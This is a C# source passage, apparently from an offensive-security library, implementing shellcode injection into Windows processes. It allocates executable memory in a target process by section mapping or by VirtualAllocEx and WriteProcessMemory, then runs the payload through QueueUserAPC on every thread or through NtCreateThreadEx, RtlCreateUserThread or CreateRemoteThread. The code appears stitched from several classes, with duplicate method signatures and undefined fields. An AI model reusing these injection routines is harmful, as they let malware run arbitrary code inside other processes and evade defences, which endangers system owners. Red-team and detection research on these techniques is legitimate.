/// <summary>
/// Opens a Thread and Queues UserAPC in a specified process.
/// </summary>
/// <author>The Wover (@TheRealWover)</author>
/// <param name="Payload">The shellcode payload to execute in the target process.</param>
/// <param name="BaseAddress">The address of the shellcode in the target process.</param>
/// <param name="Process">The target process to inject into.</param>
/// <returns></returns>
public bool Inject(PICPayload Payload, IntPtr BaseAddress, Process Process)
{
/*
* IntPtr tpointer = DynamicInvoke.Win32.OpenThread(Data.Win32.Kernel32.ThreadAccess.SetContext, false, (int)pi.dwThreadId);
* DynamicInvoke.Win32.VirtualProtectEx(pi.hProcess, alloc, sc.Length, 0x20, out oldProtect);
* DynamicInvoke.Win32.QueueUserAPC(alloc, tpointer, IntPtr.Zero);
* DynamicInvoke.Win32.ResumeThread(pi.hThread);
*
* IntPtr threadHandle = new IntPtr();
* Data.Native.NTSTATUS result = Data.Native.NTSTATUS.Unsuccessful;
*/
uint oldProtect = 0;
bool success = false;
try
{
IntPtr procHandle = Process.Handle;
success = DynamicInvoke.Win32.VirtualProtectEx(procHandle, BaseAddress, Payload.Payload.Length, Data.Win32.WinNT.PAGE_EXECUTE_READ, out oldProtect);
foreach (ProcessThread thread in Process.Threads)
{
IntPtr hThread = DynamicInvoke.Win32.OpenThread(Data.Win32.Kernel32.ThreadAccess.All, false, (int)thread.Id);
IntPtr ptr = DynamicInvoke.Win32.QueueUserAPC(BaseAddress, hThread, IntPtr.Zero);
}
success = true;
return(success);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
return(success);
}
}
/// <summary>
/// Allocate the payload in the target process.
/// </summary>
/// <author>The Wover (@TheRealWover)</author>
/// <param name="Payload">The PIC payload to allocate to the target process.</param>
/// <param name="Process">The target process.</param>
/// <param name="PreferredAddress">The preferred address at which to allocate the payload in the target process.</param>
/// <returns>Base address of allocated memory within the target process's virtual memory space.</returns>
public IntPtr Allocate(PICPayload Payload, Process Process, IntPtr PreferredAddress)
{
// Get a convenient handle for the target process.
IntPtr procHandle = Process.Handle;
// Create a section to hold our payload
IntPtr sectionAddress = CreateSection((uint)Payload.Payload.Length, sectionAttributes);
// Map a view of the section into our current process with RW permissions
SectionDetails details = MapSection(Process.GetCurrentProcess().Handle, sectionAddress,
localSectionPermissions, IntPtr.Zero, Convert.ToUInt32(Payload.Payload.Length));
// Copy the shellcode to the local view
System.Runtime.InteropServices.Marshal.Copy(Payload.Payload, 0, details.baseAddr, Payload.Payload.Length);
// Now that we are done with the mapped view in our own process, unmap it
Data.Native.NTSTATUS result = UnmapSection(Process.GetCurrentProcess().Handle, details.baseAddr);
// Now, map a view of the section to other process. It should already hold the payload.
SectionDetails newDetails;
if (PreferredAddress != IntPtr.Zero)
{
// Attempt to allocate at a preferred address. May not end up exactly at the specified location.
// Refer to MSDN documentation on ZwMapViewOfSection for details.
newDetails = MapSection(procHandle, sectionAddress, remoteSectionPermissions, PreferredAddress, (ulong)Payload.Payload.Length);
}
else
{
newDetails = MapSection(procHandle, sectionAddress, remoteSectionPermissions, IntPtr.Zero, (ulong)Payload.Payload.Length);
}
return(newDetails.baseAddr);
}
/// <summary>
/// Allocate the payload in the target process.
/// </summary>
/// <param name="Payload">The PIC payload to allocate to the target process.</param>
/// <param name="Process">The target process.</param>
/// <returns>Base address of allocated memory within the target process's virtual memory space.</returns>
///
public IntPtr Allocate(PICPayload Payload, Process Process)
{
if (!IsSupportedPayloadType(Payload))
{
throw new PayloadTypeNotSupported(Payload.GetType());
}
// Get a convenient handle for the target process.
IntPtr procHandle = DynamicInvoke.Win32.OpenProcess(Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_OPERATION | Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_WRITE | Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_READ, false, (uint)Process.Id);
//create a IntPtr to return the base address of the allocated mem
IntPtr alloc = DynamicInvoke.Win32.VirtualAllocEx(procHandle, IntPtr.Zero, (uint)Payload.Payload.Length, Data.Win32.Kernel32.MEM_COMMIT | Data.Win32.Kernel32.MEM_RESERVE, Data.Win32.WinNT.PAGE_EXECUTE_READWRITE);
UIntPtr bytesWritten = UIntPtr.Zero;
Boolean success = DynamicInvoke.Win32.WriteProcessMemory(procHandle, alloc, Payload.Payload, (uint)Payload.Payload.Length, out bytesWritten);
if (success)
{
return(alloc);
}
else
{
throw new Exception("an error occured trying to write memory into the process.");
}
}
public bool Inject(PICPayload Payload, AllocationTechnique AllocationTechnique, Process Process)
{
IntPtr baseAddr = AllocationTechnique.Allocate(Payload, Process);
return(Inject(Payload, baseAddr, Process));
}
/// <summary>
/// Create a thread in the remote process.
/// </summary>
/// <author>The Wover (@TheRealWover)</author>
/// <param name="Payload">The shellcode payload to execute in the target process.</param>
/// <param name="BaseAddress">The address of the shellcode in the target process.</param>
/// <param name="Process">The target process to inject into.</param>
/// <returns></returns>
public bool Inject(PICPayload Payload, IntPtr BaseAddress, Process Process)
{
IntPtr threadHandle = new IntPtr();
Data.Native.NTSTATUS result = Data.Native.NTSTATUS.Unsuccessful;
if (api == APIS.NtCreateThreadEx)
{
// Dynamically invoke NtCreateThreadEx to create a thread at the address specified in the target process.
result = DynamicInvoke.Native.NtCreateThreadEx(
ref threadHandle,
Data.Win32.WinNT.ACCESS_MASK.SPECIFIC_RIGHTS_ALL | Data.Win32.WinNT.ACCESS_MASK.STANDARD_RIGHTS_ALL,
IntPtr.Zero,
Process.Handle, BaseAddress, IntPtr.Zero,
suspended, 0, 0, 0, IntPtr.Zero
);
}
else if (api == APIS.RtlCreateUserThread)
{
// Dynamically invoke NtCreateThreadEx to create a thread at the address specified in the target process.
result = DynamicInvoke.Native.RtlCreateUserThread(
Process.Handle,
IntPtr.Zero,
suspended,
IntPtr.Zero, IntPtr.Zero, IntPtr.Zero,
BaseAddress,
IntPtr.Zero, ref threadHandle, IntPtr.Zero
);
}
else if (api == APIS.CreateRemoteThread)
{
uint flags = suspended ? (uint)0x00000004 : 0;
IntPtr threadid = new IntPtr();
// Dynamically invoke NtCreateThreadEx to create a thread at the address specified in the target process.
threadHandle = DynamicInvoke.Win32.CreateRemoteThread(
Process.Handle,
IntPtr.Zero,
0,
BaseAddress,
IntPtr.Zero,
flags,
ref threadid
);
if (threadHandle == IntPtr.Zero)
{
return(false);
}
handle = threadHandle;
return(true);
}
// If successful, return the handle to the new thread. Otherwise return NULL
if (result != Data.Native.NTSTATUS.Success)
{
return(false);
}
handle = threadHandle;
return(true);
}
